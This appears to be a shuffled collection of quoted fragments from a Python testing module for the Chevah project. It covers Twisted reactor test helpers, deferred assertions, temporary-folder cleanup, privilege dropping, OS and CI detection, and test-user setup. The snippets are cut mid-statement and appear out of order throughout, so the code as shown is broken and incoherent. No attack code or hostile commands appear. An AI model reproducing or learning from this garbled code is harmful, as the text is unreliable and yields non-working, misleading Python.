\"\"\"", "None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True", "# We delay the import as it will call lsb_release.", "are temporary files or folders left over.\\n %s' % (", "there is already a failure, the self.fail below will #", "failure into result `None` so that the failure will not", "1: for thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name):", "raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and isinstance(second, text_type)", "= os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop", "expected_type, value, msg=None): \"\"\" Raise an exception if `value` is", "raise_failure(location, reason): raise AssertionError( 'Reactor is not clean. %s: %s'", "is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix)", "raw_name = raw_name.replace('<bound method ', '') return raw_name.split(' ', 1)[0]", "self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if", "failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if deferred", "a list of members which were removed. \"\"\" if not", "% (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the CPU type", "= platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name == 'aix':", "( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs):", "at writers buffers: if len(reactor.getWriters()) > 0: have_callbacks = True", "to force to reactor to wake at an # interval", "AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. # Might be", "deferred): \"\"\" Return the current success result of C{deferred} or", "start the reactor if it is already started. # This", "\"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred) raise", "\"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result", "member from the test case.''' success_state = None # We", "class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments)", "from the fixtures/cleanup # code which is executed from another", "self._getDelayedCallName(delayed) is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback", "= [] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return", "reactor touched from the test # case itself which run", "if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown()", "not supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create a folder", "not isinstance(second, text_type) ): # noqa:cover if not msg: msg", "_SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure except ImportError:", "@classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test files from temporary", "is only for cleanup purpose and should not be used", "When running threads tests the reactor touched from the test", "0: have_callbacks = True continue for reader in reactor.getReaders(): have_callbacks", "= [] def enterCleanup(self): \"\"\" Called when start using stacked", "value, expected_type if not isinstance(value, expected_type): raise AssertionError( \"Expecting type", "% (deferred, result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString =", "be called at cleanup as it removes elements from the", "self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside the main", "clean reactor at shutdown, only if test # passed. self.assertIsNone(self._reactor_timeout_failure)", "the underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name ==", "manager for stacked cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup()", "self._teardown_errors.append(AssertionError( 'There are temporary files or folders left over.\\n %s'", "resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import WMI local_wmi", "= LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user)", "elif cls.os_family == 'nt': from wmi import WMI local_wmi =", "import as it will call lsb_release. import ld distro_name =", "os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user", "os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges", "delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break # Look at writers", "cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path =", "on %r, \" \"found type %r instead: %s\" % (", "if we prevent stop in a previous run. if reactor._started:", "level method. In most tests you would like to use", "at most 1 second. if t2 is None or t2", "run one more time to execute the stop code. reactor.iterate()", "if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks = True continue", "types provided, then this test will fail. @raise SynchronousTestCase.failureException: If", "version. It is not the marketing name. We only support", "if os_name == 'sunos': parts = platform.release().split('.') return 'solaris-%s' %", "test case. \"\"\" success = None for i in range(2,", "bla.bla.tests. is removed. The format is customized for Chevah Nose", "for key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values,", "continue to be called and the first failure is raised.", "filesystem for cleaning. if cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar()", "if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files or", "DEFERRED_TIMEOUT = 1 # List of names for delayed calls", "deferred.addBoth(result.append) if not result: self.fail( \"Success result expected on %r,", "False # Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError,", "that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a", "a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called", "returns another deferred. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "if not deferred.called: deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug)", "result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred =", "%s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % (", "not slow down all the tests, we run with a", "else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum", "import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration", "TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase,", "len(reactor.threadpool.working) > 0: have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self,", "first, second, msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname", "not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check for active", "for delayed calls to be executed and will not stop", "KeyError: success = None if success is None: raise AssertionError('Failed", "text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted = False for reader_type", "case. \"\"\" success = None for i in range(2, 6):", "interval of at most 1 second. if t2 is None", "13.0. result = [] deferred.addBoth(result.append) if not result: self.fail( \"Success", "a success result, or has an unexpected failure result. @return:", "will be removed only at the end of test. Only", "ImportError: # Twisted support is optional. _SocketWaker = None _UnixWaker", "pool. if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0)", "\"%s - %s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self,", "None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return", "for Chevah project. \"\"\" from __future__ import print_function from __future__", "followed by the major and minor NT version. It is", "temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum memory", "%s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(),", "timeout, stops the reactor. This will do recursive calls, in", "def _caller_success_member(self): \"\"\" Retrieve the 'success' member from the None", "sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self,", "\"\"\" Update to stdlib to make sure we don't compare", "lambda _: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False):", "to stdlib to make sure we don't compare str with", "def cleanTemporaryFolder(cls): \"\"\" Clean all test files from temporary folder.", "# When debug is enabled with iterate using a small", "arguments. \"\"\" if source not in target: message = u'%s", "_get_ci_name(): \"\"\" Return the name of the CI on which", "return its path and segments, which is auto cleaned. \"\"\"", "stop the reactor on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took", "'aix-%s.%s' % (platform.version(), platform.release()) if os_name != 'linux': return process_capabilities.os_name", "waiting for a deferred. _reactor_timeout_call = None def setUp(self): super(TwistedTestCase,", "will not stop the reactor. \"\"\" if timeout is None:", "= SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members", "we run with -v or we show the error. \"\"\"", "@return: The result of C{deferred}. \"\"\" # FIXME:1370: # Remove", "to enter the first loop. have_callbacks = True while have_callbacks", "in reactor.getDelayedCalls(): # We skip our own timeout call. if", "\"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='',", "defined, but with swapped # arguments. if not inspect.isclass(expected_type): expected_type,", "sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self, first, second, msg=None):", "we need # to wait at least for delayed calls.", "count=1, timeout=None, debug=False): \"\"\" Iterate the reactor without stopping it.", "Return hostname as resolved by default DNS resolver. \"\"\" return", "_baseAssertEqual(self, first, second, msg=None): \"\"\" Update to stdlib to make", "just the os_name. On Linux is the distribution name and", "== 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return", "suffix=''): \"\"\" Create a new temp folder and return its", "and not result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([ '.'.join((t.__module__, t.__name__))", "When prevent_stop=True, the reactor will not be stopped. \"\"\" if", "result = [] def cb(res): result.append(res) return res deferred.addBoth(cb) if", "# When not executed in debug mode, some test will", "deferred is a Failure. The failed deferred is handled by", "drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return", "result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return", "timeout) # Don't start the reactor if it is already", "the L{Deferred<twisted.internet.defer.Deferred>} has no result or has a failure result.", "deferred, *expectedExceptionTypes): \"\"\" Return the current failure result of C{deferred}", "\"\"\" Iterate the reactor without stopping it. \"\"\" iterations =", "> 0: have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working)", "a failure, the self.fail below will # report it, so", "raise AssertionError('Deferred is not a failure.') def assertIsNotFailure(self, deferred): \"\"\"", "msg=None): \"\"\" Raise an exception if `value` is not an", "underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt':", "'Deferred took more than %d to execute.' % timeout) #", "into the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error =", "before running the test case and removed on #: teardown.", "len(reactor.threadCallQueue) > 0: have_callbacks = True continue if reactor.threadpool and", "result = [] deferred.addBoth(result.append) if not result: self.fail( \"Success result", "more delayed calls are scheduled. This will wait for delayed", "result `None` so that the failure will not be raised", "_iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if debug:", "to avoid propagating the error into the reactor. \"\"\" self.assertWasCalled(deferred)", "-v or we show the error. \"\"\" class_name = text_type(self.__class__)[8:-2]", "UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the name of", "the # current stack and we don't care about it.", "os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if", "usage in kilo bytes. \"\"\" if cls.os_family == 'posix': import", "'PoolThread-twisted.internet.reactor', ] # We assume that hostname does not change", "if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred(", "Return working thread from pool, or empty when threadpool does", "a result at this point. If the assertion succeeds, then", "run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def", "int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP reports value in bytes,", "raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters())", "= None @property def _caller_success_member(self): \"\"\" Retrieve the 'success' member", "raise AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\"", "super filesystem for cleaning. if cls._environ_user == cls._drop_user: temp_avatar =", "mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\"", "mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='', suffix='', cleanup=True):", "def successResultOf(self, deferred): \"\"\" Return the current success result of", "might fail since it detects that internal state # is", "SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result or has a", "text_type) and isinstance(second, text_type) ): # noqa:cover if not msg:", "not isinstance(value, expected_type): raise AssertionError( \"Expecting type %s, but got", "Context manager for stacked cleanups. \"\"\" try: self.enterCleanup() yield finally:", "which were removed. \"\"\" if not mk.fs.exists(folder_segments): return [] #", "original deferred returns another deferred. Usage:: checker = mk.credentialsChecker() credentials", "is not None: self._reactor_timeout_failure = None # We stop the", "success result, or has an unexpected failure result. @return: The", "a result. DEFERRED_TIMEOUT = 1 # List of names for", "prevent_stop=False): \"\"\" This is low level method. In most tests", "callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate", "raising the error. self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') #", "it removes elements from the Twisted thread queue, which will", "= False reactor.running = False # Start running has consumed", "mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content)", "# FIXME:4428: # When not executed in debug mode, some", "in kilo bytes. \"\"\" if cls.os_family == 'posix': import resource", "from the Twisted thread queue, which will never be called.", "= sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self, first, second,", "and t2 reactor.doIteration(t) else: # FIXME:4428: # When not executed", "the original deferred returns another deferred. Usage:: checker = mk.credentialsChecker()", "self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try:", "def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create a new temp", "os_name != 'linux': return process_capabilities.os_name # We delay the import", "consumed the startup events, so we need # to restore", "Retrieve the 'success' member from the None test case. \"\"\"", "'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that the reactor has", "first,) raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and isinstance(second,", "msg = u'First is str while second is unicode for", "def getHostname(): \"\"\" Return the hostname of the current system.", "return deferred.result def assertWasCalled(self, deferred): \"\"\" Check that deferred was", "from pool, or empty list when threadpool does not exists.", "super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self, first,", "methods. If a cleanup fails, the next cleanups will continue", "None def _get_hostname(): \"\"\" Return hostname as resolved by default", "working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) >", "a previous run. if reactor._started: return reactor._startedBefore = False reactor._started", "% (platform.version(), platform.release()) if os_name != 'linux': return process_capabilities.os_name #", "def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor for `duration`", "Run the deferred and return the failure. Usage:: checker =", "when we run with -v or we show the error.", "into a specialized class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments,", "the failure result is not one of the types provided,", "which is not created yet but which will be automatically", "class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return \"%s - %s.%s\"", "\"Expecting type %s, but got %s. %s\" % ( expected_type,", "reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 = reactor.timeout()", "= reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover # Timeout", "for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception =", "the current success result of C{deferred} or raise C{self.failException}. @param", "@contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for stacked cleanups. \"\"\"", "took more than %d to execute.' % timeout) # Check", "L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result or", "-1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments,", "of C{deferred}. \"\"\" # FIXME:1370: # Remove / re-route this", "version of the underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if", "contains delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break # Look at", "= self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls()", "chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem #", "\"\"\" Ignore the current failure on the deferred. It transforms", "writers from the reactor. This is only for cleanup purpose", "deferred,)) elif isinstance(result[0], Failure): self.fail( \"Success result expected on %r,", "has a failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has", "but which will be automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup,", "prevent_stop=False): \"\"\" Run the deferred and return the failure. Usage::", "not exists or has no job. \"\"\" if not reactor.threadpool:", "_CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case for Chevah tests.", "will not be raised at reactor shutdown for not being", "flag to fake a clean reactor. reactor._startedBefore = False reactor._started", "the distribution name and the version. On Windows it is", "thread. if len(reactor.threadCallQueue) > 0: have_callbacks = True continue if", "import inspect import threading import os import platform import socket", "not msg: msg = u'First is unicode while second is", "== 'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release()) if", "return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path,", "return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user # Test suite", "# If there is already a failure, the self.fail below", "AssertionError as error: errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There", "sorted(second.keys()) first_values = [first[key] for key in first_keys] second_values =", "if not reactor.threadpool: return [] result = [] while len(reactor.threadpool._team._pending):", "calls, readers or writers or threads are in the queues.", "active threads, ' 'beside the main thread: %s - %s'", "most tests you would like to use `getDeferredFailure` or `getDeferredResult`.", "def assertWasCalled(self, deferred): \"\"\" Check that deferred was called. \"\"\"", "threads', reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active threads',", "break if have_callbacks: continue # Look at threads queue and", "platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if os_name == 'sunos':", "self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred)", "which will be automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix,", "timeout. if ( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if", "**kwargs): \"\"\" Overwrite unit-test behaviour to run cleanup method before", "try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self,", "the failure will not be raised at reactor shutdown for", "or has a failure result. @return: The result of C{deferred}.", "if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set", "True continue if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks =", "expectedString = \" or \".join([ '.'.join((t.__module__, t.__name__)) for t in", "system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, )", "= self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop)", "self.fail( \"Success result expected on %r, \" \"found failure result", "have_callbacks: continue if run_once: if have_callbacks: raise AssertionError( 'Reactor queue", "C{deferred}. \"\"\" # FIXME:1370: # Remove / re-route this code", "@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This means that", "# to wait at least for delayed calls. if have_callbacks:", "reactor.threadpool: return [] else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return", "if isinstance(reader, excepted_reader): have_callbacks = False break if have_callbacks: break", ") from twisted.python.failure import Failure except ImportError: # Twisted support", "threading import os import platform import socket import sys import", "deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not", "= DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for member", "has no delayed calls, readers or writers. This should only", "tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def", "= False for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted", "than %s' % (timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False,", "a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to", "all delayed calls, readers and writers from the reactor. This", "= class_name[tests_start:] return \"%s - %s.%s\" % ( self._testMethodName, class_name,", "failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more than %s' %", "segments) for a path which is not created yet. \"\"\"", "Check executing all deferred from chained callbacks. result = deferred.result", "calls. for delayed in reactor.getDelayedCalls(): # We skip our own", "debug=False, prevent_stop=False): \"\"\" Run the deferred and return the result.", "name and the version. On Windows it is the `nt`", "the marketing name. We only support the Windows NT family.", "reactor.threadpool: return [] else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\"", "def _initiateTestReactor(self, timeout): \"\"\" Do the steps required to initiate", "the error into the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure):", "unittest import TestCase try: # Import reactor last in case", "def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\" Run the", "and not self._reactor_timeout_call.cancelled ): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue", "delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self):", "result is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result.", "self._cleanup_stack = [] self._teardown_errors = [] self.test_segments = None def", "is raised. \"\"\" for function, args, kwargs in reversed(self.__cleanup__): try:", "we don't care about it. for level in inspect.stack()[1:]: try:", "maximum memory usage in kilo bytes. \"\"\" if cls.os_family ==", "L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the L{Deferred<twisted.internet.defer.Deferred>}", "Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) #", "while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise", "recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case", "started. # This can happen if we prevent stop in", "prevent_stop: # Don't continue with stop procedure. return # Let", "teardown. \"\"\" if reactor is None: return def raise_failure(location, reason):", "exitCleanup(self): \"\"\" To be called at the end of a", "args, kwargs)) def callCleanup(self): \"\"\" Call all cleanup methods. If", "to normal users.''' if cls._drop_user == '-': return os.environ['USERNAME'] =", "called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>}", "from chained callbacks. result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result,", "True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False", "have_callbacks = False break if have_callbacks: break if have_callbacks: continue", "calls', delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\"", "not find the home folder path. if not process_capabilities.get_home_folder: raise", "not reactor.threadpool: return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop())", "AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the name of the", "\"success\" attribute.') return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper", "True failure = AssertionError( 'Reactor took more than %.2f seconds", "normal tests. \"\"\" if not reactor: return try: reactor.removeAll() except", "os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ and 'USER' not", "exception in name: return True return False def addCleanup(self, function,", "code after upgrading to Twisted 13 result = [] def", "= sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def", "deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a failure result. This means", "', '') raw_name = raw_name.replace('<bound method ', '') return raw_name.split('", "path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod", "= mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase):", "1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self,", "= True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks", "== 'aarch64': return 'arm64' if base == 'x86_64': return 'x64'", "# is changed from other source. pass reactor.threadCallQueue = []", "Return (path, segments) for a path which is not created", "0: raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool", "self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is low level", "the reactor. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT", "self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred)", "return _CI_NAMES.AZURE if os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN return", "if reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue", "delayed calls are scheduled. This will wait for delayed calls", "result, has a success result, or has an unexpected failure", "need to look for other delayed calls. have_callbacks = True", "\"\"\" try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check", "class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7 class_name = class_name[tests_start:]", "reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred)", "error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\"", "\"\"\" TestCase used for Chevah project. \"\"\" from __future__ import", "Disabled when we can not find the home folder path.", "unittest2 import TestCase # Shut up you linter. TestCase else:", "cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean all", "timeout=None, debug=False): \"\"\" Iterate the reactor without stopping it. \"\"\"", "dedicated local OS account present. \"\"\" #: User will be", "is done. \"\"\" for exception in self.excepted_threads: if name in", "few DNS queries. hostname = _get_hostname() Bunch = Bunch Mock", "_raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout error while executing the", "active jobs in thread pool. if reactor.threadpool: if ( reactor.threadpool.working", "raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '') raw_name =", "deferred was not called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore", "'There are temporary files or folders left over.\\n %s' %", "= self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool", "deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the deferred and return", "lambda _: time.time() - start > duration, timeout=duration + 0.1,", "below will # report it, so swallow it in the", "failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug,", "`nt` followed by the major and minor NT version. It", "u'WHERE Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize)", "fileInTemp(self, *args, **kwargs): \"\"\" Create a file in the default", "segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod", "self.assertWasCalled(deferred) if 